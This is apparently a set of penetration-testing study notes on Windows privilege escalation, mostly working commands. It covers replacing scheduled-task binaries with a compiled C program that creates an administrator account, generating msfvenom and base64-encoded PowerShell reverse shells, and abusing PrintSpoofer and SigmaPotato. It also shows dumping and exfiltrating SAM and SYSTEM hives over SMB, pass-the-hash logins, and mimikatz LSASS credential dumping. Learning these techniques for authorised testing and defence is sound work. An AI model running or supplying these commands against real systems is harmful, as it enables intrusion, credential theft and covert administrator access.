Abusing Other Windows Components

Abusing Scheduled tasks

Privilege Escalation with Autoruns - HackTricksbook.hacktricks.xyz

three pieces of information are vital to obtain from a scheduled task to identify possible privilege escalation vectors:

As which user account (principal) does this task get executed?
What triggers are specified for the task?
What actions are executed when one or more of these triggers are met?

What we are interested in is four piece of information TaskName,Next Run Time, Author, Task To Run.

Initial Check:

# We will check for Task running with higher privilege.
# We will check when task is going to be retriggered. (If retriggered again soon then it can be helpful).
# In the majority of cases, we can leverage familiar tactics such as replacing the binary or placing a missing DLL as we did with services in a previous Learning Unit. While we don't have a service binary with scheduled tasks, we have programs and scripts specified by actions.

# -----
# Step 1: Check for Task with higher Privilege.
schtasks /query /fo LIST /v > tasks.txt
.\tasks.txt 
# Look for path that the user can modify.
 Get-Content .\tasks.txt | Select-String -Pattern "Task To Run.*Users.*exe.*"  -Context 7,0
# Other way:
Get-Content .\tasks.txt | Select-String -Pattern "Task To Run.*exe.*"  -Context 7,0 | Where-Object {$_ -notmatch "system32" }
# More preferred way:
Get-Content .\tasks.txt | Select-String -Pattern "Task To Run.*" -Context 7,0 | Where-Object { $_ -notmatch "system32" -and $_ -notmatch "Next Run Time:\s+N/A" }


# "Task To Run.*Users": This regular expression matches lines containing "Task To Run" followed by any characters (.*), and then "Users". 
# We can use "-Context 0,1" to make search easy.
# -Context 0,1: Shows 0 lines before and 1 line after each match. 
# Change above command as per need.

# Check the permission for the user on the path.
icacals <Location>
 
# Step 2: Check the time when it will next run in above command output. If it is going to run in near future then replace the file with made exe.

# Other way: 
# Below is powershell command:
Get-ScheduledTask

# Look at the permission use has on that scheduled binary.
icacals <Location>

Adding User to Administrators group and RDP Group.

174B

adduser.c

Open

adduser.c

#include <stdlib.h>

int main ()
{
  int i;
  
  // Add the user 'dave2' with the password 'password123!'
  i = system ("net user dave2 password123! /add");
  
  // Add 'dave2' to the Administrators group
  i = system ("net localgroup administrators dave2 /add");
  
  // Add 'dave2' to the Remote Desktop Users group
  i = system ("net localgroup \"Remote Desktop Users\" dave2 /add");
  
  return 0;
}

Compiling the code

# Compiling the code to exe
x86_64-w64-mingw32-gcc addusers.c -o adduser.exe

# Sending file to victim.
iwr -uri http://$IP_KALI/adduser.exe -o adduser.exe

# Now Replace the binary file.
# Replace the original binary with this one.
# Don't replace it first save original binary file.
# Example
move C:\Users\steve\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe
move .\adduser.exe C:\Users\steve\Pictures\BackendCacheCleanup.exe

# Now wait for exe file to auto run.

Now you can access the created account using below commands:

Getting Reverse from Scheduled task

# Making Reverse exe file.
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=$IP_KALI LPORT=80 -f exe -o reverse.exe

# Start the listener.
msfconsole -q -x "use multi/handler; set payload windows/x64/powershell_reverse_tcp; set LHOST $IP_KALI; set LPORT 80; run"

# Now replace in the location where you found write permission.
# You can use SMB share to copy file.
# Now wait for task to auto run.

Using Exploits

Installed Applications (Application Based Exploit)

We need to check the installed software. Sometimes installed software has publically available exploits.

# To Get List of installed software 32 bit
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

# To Get List of installed software 64 bit
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Kernal exploit

# Look for OS Version
systeminfo

# Look for a security patch installed on the system. 
Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }

# Download the publically available exploit and run it to get the shell.
# Related to This CVE-2023-29360, Details and .exe file is mentioned in module.

Abuse of SeImpersonatePrivilege

Using PrintSpoofer

Non-admin users with the SeImpersonatePrivilege can potentially escalate their privileges. This allows them to act as another user under certain conditions. While intended for legitimate use in services like RPC, it's often assigned too broadly (e.g., to Administrators), creating a potential attack vector.

# Check if SeImpersonatePrivilege is there with user or not.
whoami /priv

# if enabled then use printSpoofer to elevate the privilege.
# Run in kali linux
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe; python3 -m http.server 8000

# In windows's Powershell
iwr -uri http://192.168.45.215:8000/PrintSpoofer64.exe -outfile PrintSpoofer64.exe

# Run the file.
.\PrintSpoofer64.exe -i -c powershell.exe
# You will see your priviege is escalated.
# we can also use reverse payload for getting shell.

# Shell is generated using https://www.revshells.com/
# example:
.\PrintSpoofer64.exe -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMAA1ACIALAA4ADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

Using SigmaPotato

We can use this to run a command or get the shell.

GitHub - tylerdotrar/SigmaPotato: SeImpersonate privilege escalation tool for Windows 8 - 11 and Windows Server 2012 - 2022 with extensive PowerShell and .NET reflection support.GitHub

# Check if SeImpersonatePrivilege is there with the user or not.
whoami /priv

# In Kali
# Download this tool:
wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe

# Start webserver and sent it to victim machine.
python3 -m http.server 8000

# Send it to victim machine.
iwr -uri http://192.168.45.229:8000/SigmaPotato.exe -Outfile SigmaPotato.exe

# Add new user:
.\SigmaPotato "net user dave4 lab /add"
.\SigmaPotato "net localgroup Administrators dave4 /add"

# Now we can access this user as RDP also. 
xfreerdp /v:192.168.109.220 /u:dave4 /p:lab /cert-ignore /dynamic-resolution
# Got GUI access.


# Getting shell (Tried but not working in my case):
.\SigmaPotato.exe --revshell $IP_KALI 4444
# Example:
# .\SigmaPotato.exe --revshell 192.168.45.229 4444
# it did not work. Let's try base64 encoded reverse powershell code.
# Generate code using Python code:
wget https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.py

python3 mkpsrevshell.py $IP_KALI 4444

# Start listener.
sudo rlwrap nc -lnvp 4444

# Run below command:
.\SigmaPotato.exe "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA5ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="

# Not got the shell.

Abuse of SeBackupPrivilege

# . This privilege allows you to bypass normal file read restrictions, even if you don’t have explicit permissions, as it provides "backup and restore" access to files.

# Let's abuse it.
# I will dump
reg save hklm\system system.bak
reg save hklm\sam sam.bak

# Now I will download it to kali linux.

# Transfer file to kali linux.
# Start smbserver in kali linux
impacket-smbserver -smb2support -username user -password user123 drive .

# In windows shell.
net use Z: \\192.168.45.229\drive /u:user user123

copy sam.bak Z:

copy system.bak Z:

# Now extract the hashes using secretdump.
impacket-secretsdump -sam sam.bak -system system.bak LOCAL

# Use hash to login to user of your choice.
# Example:
impacket-psexec [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:8f518eb35353d7a83d27e7fe457664e5

Abuse of SeDebugPrivilege (Not Tried yet !!)

This privilege permits the debug other processes, including to read and write in the memore.

You can use to dump hash and credential stored in LSASS.

# Use mimikatz for this.
./mimikatz.exe "privilege::debug" "token::elevate" "log" "sekurlsa::logonpasswords full" "sekurlsa::minidump lsass.dmp" "exit"

Check and use the credential. If needed crack it.

PreviousLeveraging Windows Services NextChecking Remote Desktop Connection Manager

Last updated 12 months ago